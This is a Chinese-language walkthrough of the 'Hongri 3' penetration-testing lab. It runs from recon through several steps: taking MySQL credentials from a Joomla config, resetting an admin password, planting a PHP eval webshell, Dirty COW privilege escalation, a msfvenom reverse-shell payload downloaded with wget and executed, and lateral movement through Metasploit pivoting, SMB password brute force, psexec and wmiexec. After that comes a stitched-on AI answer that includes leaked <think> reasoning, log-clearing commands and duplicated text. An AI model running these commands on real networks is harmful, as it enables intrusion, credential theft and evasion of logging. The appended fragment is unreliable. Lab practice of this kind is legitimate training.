红日三靶场

红日三
黑盒测试都不知道密码
知道web-centos是192.168.0.105
kali跟web-cenos都是桥接物理网络

1.nmap -T4 -O 192.168.0.104 查看开放端口 因为不知到版本可以加上-sV 查看发现是Linux的看到开放 80,3306,22端口
2.dirsearch -u http://192.168.0.104/ --exclude-status 400,401,403,404,405,501,503
  dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下,发现了joomla-cms网站
这个网站有固定漏洞configuration.php里面会有那个MySQL的账号密码
3.mysql -h 192.168.0.104 -u 账号 -p           
  在输入密码就可以进去
 show databases;
use joomals;
show tables;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
把登录的 am2zu的password改成123456,在那个joomla-cms登入用那个找到的administrator 和123456登入
4.因为是joomla在template中可以写入木马注意格式<?php eval($_POST'a']);?>
Editing file "/error.php" in template "beez3".根据给的话去推测路径因为dirsearch 扫描/templates/ 有这个可以推测
路径http://192.168.0.104/templates/beez3/error.php
5.用蚁剑连接一下发现了命令执行不了用插件绕过,发现插件绕过只能Linux用,把蚁剑装到kali里面去,在连接一下发现可以用,点一下php7_GC_uaf   php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中
6.发现joomla可以ssh远程连接,刚好192.168.0.104有开放端口22ssh但是ssh需要那个账号密码,刚刚好去蚁剑找的c盘中的tmp有许多的账号密码而且是漏洞刚刚好找到账号密码
ssh wwwuser@192.168.0.104这个不行
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104    加上参数可以了
7.发现权限不够用脏牛漏洞提权(可以 firefart的管理员账号然后密码自定义)
先在本地下好脏牛的脚本    在kali中开 python3 -m http.server让192.168.0.104下载
wget http://192.168.0.105:8000/dirty.c(kali的地址)
 gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
8.做好了以后uname -a 看看Linux的位数发现是x64的
9.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.105 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
造木马,在192.168.0.104下一下
wget http://192.168.0.105:8000/shell.elf(kali的地址)
chmod +x  shell.elf
./shell.elf
执行
10. kali开启监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 7777
run
11.  成功执行
run post/multi/manage/autoroute(添加全部记录)
run autoroute -p 
run post/multi/gather/ping_sweep rhosts=192.168.93.0/24
添加记录
12.内网信息探测 
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run
可以用那个proxychains开代理 proxychains nmap -Pn -sT -sV 192.168.93.10 -F
还有端口扫描
发现了其他的主机端口开放跟端口
     10.20.30 都是windows    100.120是Linux跟ubuntu
13   


192.168.93.10   20    30  都开放了445端口


看看永恒之蓝可以不发现不行,看看能不能用smb爆破出来密码,
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run可以
20  密码   123qwe!ASD
30      123qwe!ASD
10     zxcASDqw123!!

14.  用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run
发现都可以但是有一个10 不行
用那个impacket-master/examples中的wmiexec.py 可以攻击不
proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
可以
可以尝试扫描一下再那个windows上传fscan扫描一下内网

15 192.168.93.100 跟192.168.93.120都开放了3306MySQL(可能有弱口令漏洞)

show databases;
use joomals;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104
wwwuser_123Aqx
ssh wwwuser@192.168.0.104
python3 -m http.server
wget http://192.168.0.104:8000/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
wget  http://192.168.0.107:8000/shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run

proxychains nmap -Pn -sT -sV 192.168.93.10 -F

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run

80 web端口
135 rpc漏洞
445,139永恒之蓝端口 主要是445
3306 MySQL端口
3389 远程控制 端口
7001 weblogic漏洞
22  ssh端口
23 telent端口

<think>嗯,用户想找关于红日靶场的IT内容或技术资料,特别是涉及IT安全、靶场平台、漏洞测试和网络安全的信息。首先,我需要回顾一下用户提供的引用内容,看看哪些部分可以应用到这里。引用[1]提到红日靶场模拟了国内企业的实际业务场景,包括CMS、漏洞管理、域管理等,这应该和用户的需求相关。引用[2]和[3]分别涉及Weblogic漏洞利用和具体的工具使用,比如Redis、MDUT等,还有CVE漏洞的利用。引用[4]是关于日志清理的命令,可能和渗透后的痕迹清理有关。 用户的问题是要寻找相关的技术资料,可能需要包括靶场的设计理念、具体漏洞的利用方法、使用的工具以及渗透测试的步骤。我需要把这些信息整合起来,按照用户要求的格式,分点回答,结构清晰,同时生成相关问题。 接下来要确保回答中提到的技术点都有对应的引用来源,比如红日靶场的环境设计引用[1],Weblogic漏洞引用[2],工具使用引用[3],日志清理引用[4]。同时,需要检查用户提供的系统级指令,比如数学表达式使用$...$,但在这个问题中可能用不上,不过要留意是否有数学相关的内容。用户还要求生成相关问题,这部分需要围绕红日靶场的技术点来提问,比如渗透测试流程、漏洞利用方法、工具使用等。 另外,要确保回答用中文,并且引用标识自然添加在段落末尾。例如,在提到靶场设计时引用[^1],提到Weblogic漏洞时引用[^2],工具使用引用[^3],日志清理引用[^4]。需要避免使用Markdown格式,但用户给的示例中使用了代码块,可能需要在回答中包含代码示例,比如日志清理的命令,这时候用反引号包裹。 最后,生成的相关问题要围绕红日靶场的不同方面,比如环境搭建、漏洞分析、工具使用、渗透技巧等,确保问题具有针对性和实用性,帮助用户进一步探索相关内容。</think>### 红日靶场 IT安全技术解析 红日靶场作为国内领先的渗透测试训练平台,其核心价值在于**真实企业场景模拟**和**ATT&CK攻防框架实践**。以下是关键技术要点: #### 1. 靶场环境架构设计 - **多维度渗透路径**:覆盖Web应用层(如CMS漏洞)、中间件层(WebLogic漏洞)、内网域控等层级 - **典型漏洞集成**- **典型漏洞集成**: - **WebLogic反序列化漏洞**(CVE-2016-0638):通过`WebLogicTool`扫描验证,利用工具直接执行系统命令 ```bash java -jar WebLogicTool.jar -t CVE-2016-0638 -u http://target:7001 ``` - **Laravel远程代码执行**(CVE-2021-3129):使用专用EXP工具实现RCE #### 2. 渗透测试技术栈 - **工具链配置**: - 数据库利用:`Redis Insight`管理Redis数据库,`MDUT`进行多数据库联合攻击 - 后门维持:`Godzilla v2.96`和`中国蚁剑`双通道Webshell管理 - 横向移动:`cdk`检测容器环境漏洞,`mimikatz`抓取域凭据 - **痕迹清理技术**: ```powershell wevtutil cl security # 清除安全日志 wevtutil cl system # 清除系统日志 ``` 需配合`meterpreter`的`clearev`模块实现自动化清理 #### 3. 域渗透专项训练 - **黄金票据伪造**:通过域控服务器获取KRBTGT账户的NTLM哈希 - **SMB中继攻击**:利用Responder工具捕获Net-NTLMv2哈希 - **GPO策略利用**:通过组策略部署恶意计划任务
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值